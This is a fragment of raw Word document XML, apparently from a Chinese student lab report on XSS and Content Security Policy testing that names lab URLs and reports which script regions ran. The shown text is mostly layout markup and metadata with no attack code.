          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DEDA89" w14:textId="40B42260" w:rsidR="00504164" w:rsidRDefault="00504164" w:rsidP="006001F9">
      <w:r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 wp14:anchorId="4A02888F" wp14:editId="75E3FA6D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274310" cy="2727960"/>
            <wp:effectExtent l="0" t="0" r="254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8" b="21605"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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结果显示如下：1</w:t>
      </w:r>
      <w:r>
        <w:t>,2,4,5,6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>区域js程序执行成功，显示O</w:t>
      </w:r>
      <w:r>
        <w:t>K</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB54D18" w14:textId="6C68242C" w:rsidR="00504164" w:rsidRPr="00504164" w:rsidRDefault="00504164" w:rsidP="006001F9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F5776E3" w14:textId="71A7AFB2" w:rsidR="00357EF7" w:rsidRDefault="00357EF7" w:rsidP="006001F9"/>
    <w:p w14:paraId="2502AEDC" w14:textId="72FAEBE3" w:rsidR="00357EF7" w:rsidRDefault="00357EF7" w:rsidP="006001F9"/>
    <w:p w14:paraId="1F3845A0" w14:textId="4CD3BCCD" w:rsidR="00357EF7" w:rsidRDefault="00357EF7" w:rsidP="006001F9"/>
    <w:p w14:paraId="71FEEEB8" w14:textId="5C18F869" w:rsidR="00357EF7" w:rsidRDefault="00357EF7" w:rsidP="006001F9"/>
    <w:p w14:paraId="44FEBFD1" w14:textId="7C118F70" w:rsidR="00357EF7" w:rsidRDefault="00357EF7" w:rsidP="006001F9"/>
    <w:p w14:paraId="48B8A5B6" w14:textId="6EBA11DA" w:rsidR="00357EF7" w:rsidRDefault="00357EF7" w:rsidP="006001F9"/>
    <w:p w14:paraId="734BD71F" w14:textId="3F88B513" w:rsidR="00357EF7" w:rsidRDefault="00357EF7" w:rsidP="006001F9"/>
    <w:p w14:paraId="7A977AA2" w14:textId="204885CD" w:rsidR="00357EF7" w:rsidRDefault="00357EF7" w:rsidP="006001F9"/>
    <w:p w14:paraId="1941C126" w14:textId="0A9B80B6" w:rsidR="00357EF7" w:rsidRDefault="00357EF7" w:rsidP="006001F9"/>
    <w:p w14:paraId="0AA5788C" w14:textId="090E4FB4" w:rsidR="00357EF7" w:rsidRDefault="00357EF7" w:rsidP="006001F9"/>
    <w:p w14:paraId="051472C1" w14:textId="7C82F8BA" w:rsidR="00357EF7" w:rsidRDefault="00357EF7" w:rsidP="006001F9"/>
    <w:p w14:paraId="478CF4A0" w14:textId="05917E1D" w:rsidR="00357EF7" w:rsidRDefault="00357EF7" w:rsidP="006001F9"/>
    <w:p w14:paraId="399FC5CC" w14:textId="417403D8" w:rsidR="00357EF7" w:rsidRDefault="00357EF7" w:rsidP="006001F9"/>
    <w:p w14:paraId="1AC43C0E" w14:textId="75409C9B" w:rsidR="00357EF7" w:rsidRDefault="00357EF7" w:rsidP="006001F9"/>
    <w:p w14:paraId="4AC4D700" w14:textId="7C78FC07" w:rsidR="00357EF7" w:rsidRDefault="00357EF7" w:rsidP="006001F9"/>
    <w:p w14:paraId="4869A15D" w14:textId="77777777" w:rsidR="00357EF7" w:rsidRPr="00357EF7" w:rsidRDefault="00357EF7" w:rsidP="006001F9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00357EF7" w:rsidRPr="00357E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5CF112" w14:textId="77777777" w:rsidR="00B52A72" w:rsidRDefault="00B52A72" w:rsidP="00CA1B7C">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="01A99B5E" w14:textId="77777777" w:rsidR="00B52A72" w:rsidRDefault="00B52A72" w:rsidP="00CA1B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57A8BD" w14:textId="77777777" w:rsidR="00B52A72" w:rsidRDefault="00B52A72" w:rsidP="00CA1B7C">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="64866F09" w14:textId="77777777" w:rsidR="00B52A72" w:rsidRDefault="00B52A72" w:rsidP="00CA1B7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378"/>
    <w:rsid w:val="00274574"/>
    <w:rsid w:val="002C1304"/>
    <w:rsid w:val="00357EF7"/>
    <w:rsid w:val="00365208"/>
    <w:rsid w:val="00371799"/>
    <w:rsid w:val="00385DBB"/>
    <w:rsid w:val="004075F8"/>
    <w:rsid w:val="004440FA"/>
    <w:rsid w:val="004B3BAF"/>
    <w:rsid w:val="004E380A"/>
    <w:rsid w:val="00504164"/>
    <w:rsid w:val="00512696"/>
    <w:rsid w:val="00585B0D"/>
    <w:rsid w:val="006001F9"/>
    <w:rsid w:val="0061664B"/>
    <w:rsid w:val="006C7DA1"/>
    <w:rsid w:val="006E33E3"/>
    <w:rsid w:val="006F661C"/>
    <w:rsid w:val="007375A8"/>
    <w:rsid w:val="008F7B0E"/>
    <w:rsid w:val="009B7100"/>
    <w:rsid w:val="009D7E7B"/>
    <w:rsid w:val="00A03378"/>
    <w:rsid w:val="00A44320"/>
    <w:rsid w:val="00A8559C"/>
    <w:rsid w:val="00AB0C88"/>
    <w:rsid w:val="00B52A72"/>
    <w:rsid w:val="00C33845"/>
    <w:rsid w:val="00C60E7F"/>
    <w:rsid w:val="00CA1B7C"/>
    <w:rsid w:val="00CA1E10"/>
    <w:rsid w:val="00EA1319"/>
    <w:rsid w:val="00ED1C2F"/>
    <w:rsid w:val="00F9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1873A2"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{127956E6-3450-4A53-A9B3-AF1E85C34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0E7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60E7F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CA1B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A1B7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A1B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A1B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0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www.example32.com:8000/csptest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xsslabelgg.com/action/profile/edit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12</Pages>
  <Words>984</Words>
  <Characters>5614</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>46</Lines>
  <Paragraphs>13</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>6585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叶付月</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy> </cp:lastModifiedBy>
  <cp:revision>18</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-15T07:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-16T09:33:00Z</dcterms:modified>
</cp:coreProperties>
</file>